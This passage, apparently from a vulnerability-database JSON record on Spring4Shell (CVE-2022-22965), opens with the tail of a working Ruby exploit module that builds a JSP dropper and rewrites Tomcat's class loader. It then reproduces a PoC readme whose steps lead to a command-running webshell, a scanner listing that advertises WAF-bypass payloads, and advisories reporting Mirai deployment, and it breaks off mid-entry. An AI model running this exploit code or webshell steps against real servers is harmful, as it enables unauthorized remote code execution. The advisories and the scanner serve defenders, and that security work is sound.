jsp.each_line do |l|\n if l =~ /<%.*%>/\n output << l\n elsif l =~ /<%/\n next\n elsif l =~ /%>/\n next\n elsif l.chomp.empty?\n next\n else\n output << \"<% #{l.chomp} %>\"\n end\n end\n output\n end\n\n def create_jsp\n jsp = <<~EOS\n <%\n File jsp=new File(getServletContext().getRealPath(File.separator) + File.separator + \"#{@jsp_file}\");\n jsp.delete();\n %>\n #{Faker::Internet.uuid}\n EOS\n if target['Arch'] == ARCH_JAVA\n jsp << fix(payload.encoded)\n else\n payload_exe = generate_payload_exe\n payload_filename = rand_text_alphanumeric(rand(4..7))\n\n if target['Platform'] == 'win'\n payload_path = datastore['WritableDir'] + '\\\\' + payload_filename\n else\n payload_path = datastore['WritableDir'] + '/' + payload_filename\n end\n\n jsp << jsp_dropper(payload_path, payload_exe)\n register_files_for_cleanup(payload_path)\n end\n\n jsp\n end\n\n def check\n @checkcode = _check\n end\n\n def _check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))\n )\n\n return CheckCode::Unknown('Web server seems unresponsive') unless res\n\n if res.headers.key?('Server')\n res.headers['Server'].match(%r{(.*)/([\\d|.]+)$})\n else\n res.body.match(%r{Apache\\s(.*)/([\\d|.]+)})\n end\n\n server = Regexp.last_match(1) || nil\n version = Rex::Version.new(Regexp.last_match(2)) || nil\n\n return Exploit::CheckCode::Safe('Application does not seem to be running under Tomcat') unless server && server.match(/Tomcat/)\n\n vprint_status(\"Detected #{server} #{version} running\")\n\n if datastore['HTTP_METHOD'] == 'Automatic'\n # prefer POST over get to keep the vars out of the query string if possible\n methods = %w[POST GET]\n else\n methods = [ datastore['HTTP_METHOD'] ]\n end\n\n methods.each do |method|\n vars = \"vars_#{method == 'GET' ? 'get' : 'post'}\"\n res = send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }\n )\n\n # setting the default assertion status to a valid status\n send_request_cgi(\n 'method' => method,\n 'uri' => normalize_uri(datastore['TARGETURI']),\n vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }\n )\n return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n prefix_jsp = rand_text_alphanumeric(rand(3..5))\n date_format = rand_text_numeric(rand(1..4))\n @jsp_file = prefix_jsp + date_format + '.jsp'\n http_method = datastore['HTTP_METHOD']\n if http_method == 'Automatic'\n # if the check was skipped but we need to automatically identify the method, we have to run it here\n @checkcode = check if @checkcode.nil?\n http_method = @checkcode.details[:method]\n fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?\n\n print_good(\"Automatically identified HTTP method: #{http_method}\")\n end\n\n # if the check method ran automatically, add a short delay before continuing with exploitation\n sleep(5) if @checkcode\n\n # Prepare the JSP\n print_status(\"#{peer} - Generating JSP...\")\n\n # rubocop:disable Style/FormatStringToken\n jsp = create_jsp.gsub('<%', '%{c1}i').gsub('%>', '%{c2}i')\n # rubocop:enable Style/FormatStringToken\n\n # Modify the Class Loader\n print_status(\"#{peer} - Modifying Class Loader...\")\n properties = {\n payload: jsp,\n directory: datastore['PAYLOAD_PATH'],\n prefix: prefix_jsp,\n suffix: '.jsp',\n file_date_format: date_format\n }\n res = modify_class_loader(http_method, properties)\n unless res\n fail_with(Failure::TimeoutExpired, \"#{peer} - No answer\")\n end\n\n # No matter what happened, try to 'restore' the Class Loader\n properties = {\n payload: '',\n directory: '',\n prefix: '',\n suffix: '',\n file_date_format: ''\n }\n\n modify_class_loader(http_method, properties)\n\n check_log_file\n\n handler\n end\n\n # Retry the block until it returns a truthy value. Each iteration attempt will\n # be performed with expoential backoff. If the timeout period surpasses, false is returned.\n def retry_until_true(timeout:)\n start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n ending_time = start_time + timeout\n retry_count = 0\n while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time\n result = yield\n return result if result\n\n retry_count += 1\n remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)\n break if remaining_time_budget <= 0\n\n delay = 2**retry_count\n if delay >= remaining_time_budget\n delay = remaining_time_budget\n vprint_status(\"Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}\")\n else\n vprint_status(\"Sleeping for #{delay} seconds before attempting again\")\n end\n\n sleep delay\n end\n\n false\n end\nend\n", "sourceHref": "https://0day.today/exploit/37692", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-05-10T13:38:58", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq3n6pTYJadYNCpjVegHxZFc8ZwiZUtKbPgpxPlbSd7vQgjUEfKFw0cO8jrAjpHsv_tzZAG_chVh9Mwrrh9UpIHbkniKAjKptmjj-rJ2uOjSxvBrPfVn3H2AZpIjCO-1Lrt4HnOxh7SS5SrMbbIttLpUzw7xDtIat1yKhbVk_0JgC8RDhwEXTMEuY/s745/Spring4Shell.png>)\n\n \n\n\nThis is a dockerized application that is [vulnerable](<https://www.kitploit.com/search/label/Vulnerable> \"vulnerable\" ) to the Spring4Shell [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) (CVE-2022-22965). Full Java source for the war is provided and modifiable, the war will get re-built whenever the docker image is built. The built WAR will then be loaded by Tomcat. There is nothing special about this application, it's a simple hello world that's based off [Spring tutorials](<https://spring.io/guides/gs/handling-form-submission/> \"Spring tutorials\" ).\n\nDetails: <https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities>\n\nHaving issues with the POC? Check out the LunaSec fork at: <https://github.com/lunasec-io/Spring4Shell-POC>, it's more actively maintained.\n\n## Requirements\n\n 1. Docker\n 2. Python3 + requests library\n\n## Instructions\n\n 1. Clone the repository\n 2. Build and run the container: `docker build . -t spring4shell && docker run -p 8080:8080 spring4shell`\n 3. App should now be available at <http://localhost:8080/helloworld/greeting>\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/webpage.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(7\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEgiSKKOBdAf-H6x6nvFmF2wHQ0WkAKdimGQcO3ortF_UVrOhKDkUDmIr4gxFzpaEaodNjEbpOo2z05EuGygz6K7atd6sXZYvXGfs60tMvLY5ZPxKOwuFrODicy7AbrL7kskqnDMETdZ2FPvJ1mD0gw2LxfG-qch-LSC8tBo7hIW-JM4Jj9jGhkehhhD>)\n\n 4. Run the exploit.py script: `python exploit.py --url \"http://localhost:8080/helloworld/greeting\"`\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/runexploit_2.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(8\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhXbcvigqvcJMzQzqHzuPqv8kDD2hEASz5zefNLhrnslPL6PVh8EdqWR0NFrOVdonBf7kBvzydhbiiPpBmFXSQun215RFALW4ijb3ucOIgmJKqELuISNRn59h8q-FHSlsEeoc594Ns_vIAkKrrogsoVbif_ufTU9Udrr2Umykdeyz9b0o3y5DkRXVhj>)\n\n 5. Visit the created webshell! Modify the `cmd` GET parameter for your commands. (`http://localhost:8080/shell.jsp` by default)\n\n[](<https://github.com/reznok/Spring4Shell-POC/blob/master/screenshots/RCE.png?raw=true> \"Dockerized Spring4Shell \\(CVE-2022-22965\\) PoC application and exploit \\(9\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEgTxfQevfT3YeenETl-w22eGNM_pdTzRn-0Nr0fwMbrmE7CLOkf33fpWA0N4zEloY3M1qI7ja7sQ-MziwLKY0FoiMoJ1e1kPhHSTMnyCU8L358ZRZTXcLmZDM7U9FHf7YuvY_3Nu3l17zdYcxQC4C9UgkypJ82wWMrgZt1jZ1cS_-2kOH7GfPdZgu6F>)\n\n## Notes\n\n**Fixed!** ~~As of this writing, the [container](<https://www.kitploit.com/search/label/Container> \"container\" ) (possibly just Tomcat) must be restarted between exploitations. I'm actively trying to resolve this.~~\n\nRe-running the exploit will create an extra artifact file of {old_filename}_.jsp.\n\nPRs/DMs [@Rezn0k](<https://twitter.com/rezn0k> \"@Rezn0k\" ) are welcome for improvements!\n\n## Credits\n\n * [@esheavyind](<https://twitter.com/esheavyind> \"@esheavyind\" ) for help on building a PoC. Check out their writeup at: <https://gist.github.com/esell/c9731a7e2c5404af7716a6810dc33e1a>\n * [@LunaSecIO](<https://twitter.com/LunaSecIO> \"@LunaSecIO\" ) for improving the documentation and exploit\n * [@rwincey](<https://twitter.com/rwincey> \"@rwincey\" ) for making the exploit replayable without requiring a [Tomcat](<https://www.kitploit.com/search/label/Tomcat> \"Tomcat\" ) restart\n \n \n\n\n**[Download Spring4Shell-POC](<https://github.com/reznok/Spring4Shell-POC> \"Download Spring4Shell-POC\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T12:30:00", "type": "kitploit", "title": "Spring4Shell-POC - Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-10T12:30:00", "id": "KITPLOIT:3050371869908791295", "href": "http://www.kitploit.com/2022/05/spring4shell-poc-dockerized.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-24T21:41:15", "description": "# [](<https://blogger.googleusercontent.com/img/a/AVvXsEiq83rixQ33OKbmoWJi89WYHdc4DrLKjaF4Fb_oNC9eI-0dinGfghgU-ON86t-dvUArvvR4Uytjd8t4wjK3r0hSR6SojDsdxtk5oTYh9zXEVVj_Vwr5Jv4R77tpdZamnECE8jW0wK86UlAO3xZNSDsr5XlvkezzB-JxjKcV1r204vACkoGhTZ5kDzKX>)\n\n#### \n\n\n#### A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities\n\n[](<https://camo.githubusercontent.com/50b8ab2234bbab2c18588a670936521d1ff5e59d5ca623a9a462da51a3ceafab/68747470733a2f2f646b68396568776b697363342e636c6f756466726f6e742e6e65742f7374617469632f66696c65732f38623637376131622d376335332d343062312d393333652d6531306635373163386262382d737072696e67347368656c6c2d44656d6f2e706e67> \"A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities \\(2\\)\" )[](<https://blogger.googleusercontent.com/img/a/AVvXsEhwUOGEkZWllztaONh15l-vccNxhEwBTiFlTp4EjnrWMxaQLx2Jazoo4d04LSQWwsomwL48sBTjfRoxCS0VtEC6FgI6jUjnQBbh_-dcDCKxovaU-2Su5R2LIHzccE1YG7A-NPawwE7dEld8q-n6CbDiSLi9-bW_6pwV8bvM5HRiVN9UHYqE9Y71sv4c>)\n\n# Features\n\n * Support for lists of URLs.\n * Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).\n * Fuzzing for HTTP GET and POST methods.\n * Automatic validation of the [vulnerability](<https://www.kitploit.com/search/label/Vulnerability> \"vulnerability\" ) upon discovery.\n * Randomized and non-intrusive payloads.\n * WAF Bypass payloads.\n\n \n\n\n# Description\n\nThe Spring4Shell RCE is a critical vulnerability that FullHunt has been researching since it was released. We worked with our customers in scanning their environments for Spring4Shell and Spring Cloud RCE vulnerabilities.\n\nWe're open-sourcing an open detection scanning tool for discovering Spring4Shell (CVE-2022-22965) and Spring Cloud RCE (CVE-2022-22963) vulnerabilities. This shall be used by security teams to scan their infrastructure, as well as test for WAF bypasses that can result in achieving successful [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) of the organization's environment.\n\nIf your organization requires help, please contact (team at fullhunt.io) directly for a full attack surface [discovery](<https://www.kitploit.com/search/label/Discovery> \"discovery\" ) and scanning for the Spring4Shell vulnerabilities.\n\n# Usage\n\nManagement Platform. [\u2022] Secure your External Attack Surface with FullHunt.io. usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] optional arguments: -h, --help show this help message and exit -u URL, --url URL Check a single URL. -p PROXY, --proxy PROXY Send requests through proxy -l USEDLIST, --list USEDLIST Check a list of URLs. --payloads-file PAYLOADS_FILE Payloads file - [default: payloads.txt]. --waf-bypass Extend scans with WAF bypass payloads. --request-type REQUEST_TYPE Request Type: (get, post, all) - [Default: all]. --test-CVE-2022-22963 Test for [CVE-2022-22963](<https://www.kitploit.com/search/label/CVE-2022-22963> \"CVE-2022-22963\" ) (Spring Cloud RCE). \">\n \n \n $ ./spring4shell-scan.py -h \n [\u2022] CVE-2022-22965 - Spring4Shell RCE Scanner \n [\u2022] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. \n [\u2022] Secure your External Attack Surface with FullHunt.io. \n usage: spring4shell-scan.py [-h] [-u URL] [-p PROXY] [-l USEDLIST] [--payloads-file PAYLOADS_FILE] [--waf-bypass] [--request-type REQUEST_TYPE] [--test-CVE-2022-22963] \n \n optional arguments: \n -h, --help show this help message and exit \n -u URL, --url URL Check a single URL. \n -p PROXY, --proxy PROXY \n Send requests through proxy \n -l USEDLIST, --list USEDLIST \n Check a list of URLs. \n --payloads-file PAYLOADS_FILE \n Payloads file - [default: payloads.txt]. \n --waf-bypass Extend scans with WAF bypass payloads. \n --request-type REQUEST_TYPE \n Request Type: (get, post, all) - [Default: all]. \n --test-CVE-2022-22963 \n Test for CVE-2022-22963 (Spring Cloud RCE).\n\n## Scan a Single URL\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local\n\n## Discover WAF bypasses against the environment\n \n \n $ python3 spring4shell-scan.py -u https://spring4shell.lab.secbot.local --waf-bypass\n\n## Scan a list of URLs\n \n \n $ python3 spring4shell-scan.py -l urls.txt\n\n## Include checks for Spring Cloud RCE (CVE-2022-22963)\n \n \n $ python3 spring4shell-scan.py -l urls.txt --test-CVE-2022-22963 \n \n\n# Installation\n \n \n $ pip3 install -r requirements.txt \n \n\n# Docker Support\n \n \n git clone https://github.com/fullhunt/spring4shell-scan.git \n cd spring4shell-scan \n sudo docker build -t spring4shell-scan . \n sudo docker run -it --rm spring4shell-scan \n \n # With URL list \"urls.txt\" in current directory \n docker run -it --rm -v $PWD:/data spring4shell-scan -l /data/urls.txt\n\n# About FullHunt\n\nFullHunt is the next-generation attack surface management (ASM) platform. FullHunt enables companies to discover all of their attack surfaces, monitor them for exposure, and continuously scan them for the latest security vulnerabilities. All, in a single platform, and more.\n\nFullHunt provides an enterprise platform for organizations. The FullHunt Enterprise Platform provides extended scanning and capabilities for customers. FullHunt Enterprise platform allows organizations to closely monitor their external attack surface, and get detailed alerts about every single change that happens. Organizations around the world use the FullHunt Enterprise Platform to solve their continuous security and external attack surface security challenges.\n\n# Legal Disclaimer\n\nThis project is made for educational and ethical testing purposes only. Usage of spring4shell-scan for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n# License\n\nThe project is licensed under MIT License.\n\n# Author\n\n_Mazin Ahmed_\n\n * Email: _mazin at FullHunt.io_\n * FullHunt: <https://fullhunt.io>\n * Website: <https://mazinahmed.net>\n * Twitter: <https://twitter.com/mazen160>\n * Linkedin: [http://linkedin.com/in/infosecmazinahmed](<https://linkedin.com/in/infosecmazinahmed> \"http://linkedin.com/in/infosecmazinahmed\" )\n \n \n\n\n**[Download Spring4Shell-Scan](<https://github.com/fullhunt/spring4shell-scan> \"Download Spring4Shell-Scan\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-24T21:30:00", "type": "kitploit", "title": "Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-24T21:30:00", "id": "KITPLOIT:6278364996548285306", "href": "http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-05-19T18:23:44", "description": "spring-beans is vulnerable to remote code execution. Using Spring Parameter Binding with non-basic parameter types, such as POJOs, allows an unauthenticated attacker to execute arbitrary code on the target system by writing or uploading arbitrary files (e.g .jsp files) to a location that can be loaded by the application server. Initial analysis at time of writing shows that exploitation of the vulnerability is only possible with JRE 9 and above, and Apache Tomcat 9 and above, and that the vulnerability requires the usage of Spring parameter binding with non-basic parameter types such as POJOs.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T00:56:39", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-19T16:55:07", "id": "VERACODE:34883", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34883/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-04-12T15:26:10", "description": "THREAT LEVEL: Red For a detailed advisory, download the pdf file here A zero-day vulnerability has been discovered in the Spring framework, a Java framework that provides infrastructure support for web application development. This vulnerability came to light after a Chinese researcher made a GitHub commit that was quickly erased. The vulnerability remained unassigned for over 24 hours before being assigned an official identifier CVE-2022-22965. The remote code execution bug affects Spring MVC and Spring WebFlux apps running on JDK 9+. By sending a carefully crafted request to a susceptible server, an attacker could exploit Spring4Shell. The publicly available exploit, on the other hand, requires the software to run as a WAR deployment on Tomcat. If the software is deployed as a Spring Boot executable jar, which is the default, it is not vulnerable to this vulnerability. However, the nature of the vulnerability is wide, and there may be many more ways to exploit it. An active exploitation of Spring4Shell has been observed, an attacker is able to weaponize and execute the Mirai botnet malware on vulnerable servers, specifically in the Singapore region. The Mirai sample is downloaded to the \u201c/tmp\u201d folder and executed after permissions are changed to make them executable using \u201cchmod\u201d Organizations using Spring Framework with version 5.3.x should upgrade to 5.3.18+ and version 5.2.x should upgrade to 5.2.20+. Potential MITRE ATT&CK TTPs are: TA0042: Resource Development T1588: Obtain Capabilities T1588.006: Obtain Capabilities: Vulnerabilities TA0002: Execution T1203: Exploitation for Client Execution Vulnerability Details Indicators of Compromise (IoCs) Patch Links https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://tanzu.vmware.com/security/cve-2022-22965 References https://www.praetorian.com/blog/spring-core-jdk9-rce/ https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T02:21:11", "type": "hivepro", "title": "RCE Spring Framework Zero-Day vulnerability\u00a0\u201cSpring4Shell\u201d", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T02:21:11", "id": "HIVEPRO:41D5BC8D50B4CA10D9CCDA18E6528C27", "href": "https://www.hivepro.com/rce-spring-framework-zero-day-vulnerability-spring4shell/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-20T13:33:01", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 438 3 3 53 16 54 The second week of April 2022 witnessed the discovery of 438 vulnerabilities out of which 3 gained the attention of Threat Actors and security researchers worldwide. All these 3 were zero-day and require immediate action. Further, we also observed 3 Threat Actor groups being highly active in the last week. Armageddon, a well-known Russian threat actor group popular for information theft and espionage, was observed targeting European government agencies Additionally, 2 Threat Actor groups originating from China were observed targeting organizations all around the world. Common TTPs which could potentially be exploited by these threat actors or CVEs can be found in the detailed section. Detailed Report: Interesting Vulnerabilities: Vendor CVEs Patch Link CVE-2022-23176* https://www.watchguard.com/support/release-notes/fireware/12/en-US/EN_ReleaseNotes_Fireware_12_7/index.html CVE-2021-44228* https://logging.apache.org/log4j/2.x/manual/migration.html https://kb.vmware.com/s/article/87073 CVE-2022-22965* https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://tanzu.vmware.com/security/cve-2022-22965 zero-day vulnerability Active Actors: Icon Name Origin Motive APT 10 (Stone Panda, menuPass, Red Apollo, CVNX, Potassium, Hogfish, Happyyongzi, Cicada, Bronze Riverside, CTG-5938, ATK 41, TA429, ITG01) China Information theft and espionage APT 19(Deep Panda, Codoso, Sunshop, TG-3551, Bronze Firestone, Pupa) China Information theft and espionage Armageddon(Gamaredon Group, Winterflounder, Primitive Bear, BlueAlpha, Blue Otso, Iron Tilden, SectorC08, Callisto, Shuckworm, Actinium, DEV-0157, UAC-0010) Russia Information theft and espionage Targeted Location: Targeted Sectors: Common TTPs: TA0043: Reconnaissance TA0042: Resource Development TA0001: Initial Access TA0002: Execution TA0003: Persistence TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0008: Lateral Movement TA0009: Collection TA0011: Command and Control TA0010: Exfiltration T1592: Gather Victim Host Information T1583: Acquire Infrastructure T1190: Exploit Public-Facing Application T1059: Command and Scripting Interpreter T1574: Hijack Execution Flow T1574: Hijack Execution Flow T1140: Deobfuscate/Decode Files or Information T1056: Input Capture T1087: Account Discovery T1210: Exploitation of Remote Services T1560: Archive Collected Data T1568: Dynamic Resolution T1041: Exfiltration Over C2 Channel T1583.001: Domains T1566: Phishing T1059.001: PowerShell T1574.001: DLL Search Order Hijacking T1574.001: DLL Search Order Hijacking T1564: Hide Artifacts T1056.001: Keylogging T1087.002: Domain Account T1021: Remote Services T1560.001: Archive via Utility T1568.001: Fast Flux DNS T1588: Obtain Capabilities T1566.001: Spearphishing Attachment T1059.003: Windows Command Shell T1574.002: DLL Side-Loading T1574.002: DLL Side-Loading T1574: Hijack Execution Flow T1003: OS Credential Dumping T1083: File and Directory Discovery T1021.001: Remote Desktop Protocol T1119: Automated Collection T1105: Ingress Tool Transfer T1588.003: Code Signing Certificates T1199: Trusted Relationship T1106: Native API T1053: Scheduled Task/Job T1055: Process Injection T1574.001: DLL Search Order Hijacking T1003.004: LSA Secrets T1046: Network Service Scanning T1021.004: SSH T1005: Data from Local System T1588.002: Tool T1078: Valid Accounts T1053: Scheduled Task/Job T1053.005: Scheduled Task T1055.012: Process Hollowing T1574.002: DLL Side-Loading T1003.003: NTDS T1018: Remote System Discovery T1039: Data from Network Shared Drive T1053.005: Scheduled Task T1078: Valid Accounts T1053: Scheduled Task/Job T1070: Indicator Removal on Host T1003.002: Security Account Manager T1082: System Information Discovery T1074: Local Data Staged T1569: System Services T1053.005: Scheduled Task T1070.003: Clear Command History T1016: System Network Configuration Discovery T1074.001: Local Data Staging T1569.002: Service Execution T1078: Valid Accounts T1070.004: File Deletion T1049: System Network Connections Discovery T1074.002: Remote Data Staging T1204: User Execution T1036: Masquerading T1056: Input Capture T1204.002: Malicious File T1036.005: Match Legitimate Name or Location T1056.001: Keylogging T1047: Windows Management Instrumentation T1036.003: Rename System Utilities T1113: Screen Capture T1027: Obfuscated Files or Information T1027.002: Software Packing T1055: Process Injection T1055.012: Process Hollowing T1620: Reflective Code Loading T1014: Rootkit T1218: Signed Binary Proxy Execution T1218.004: InstallUtil T1553: Subvert Trust Controls T1553.002: Code Signing T1078: Valid Accounts Threat Advisories: Deep Panda deploys new rootkit \u201cFire Chili\u201d by exploiting Log4shell in VMware horizon Sandworm Team using a new modular malware Cyclops Blink APT 10, a state-sponsored Chinese threat group, conducting a global cyber espionage operation RCE Spring Framework Zero-Day vulnerability \u201cSpring4Shell\u201d Attacks on European Union and Ukrainian government entities carried out by the Armageddon group", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-13T06:34:35", "type": "hivepro", "title": "Weekly Threat Digest: 4 \u2013 10 April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22965", "CVE-2022-23176"], "modified": "2022-04-13T06:34:35", "id": "HIVEPRO:C037186E3B2166871D34825A7A6719EE", "href": "https://www.hivepro.com/weekly-threat-digest-4-10-april-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-06T06:06:11", "description": "For a detailed threat digest, download the pdf file here Published Vulnerabilities Interesting Vulnerabilities Active Threat Groups Targeted Countries Targeted Industries ATT&CK TTPs 500 7 3 27 16 46 The fourth week of March 2022 witnessed the discovery of 500 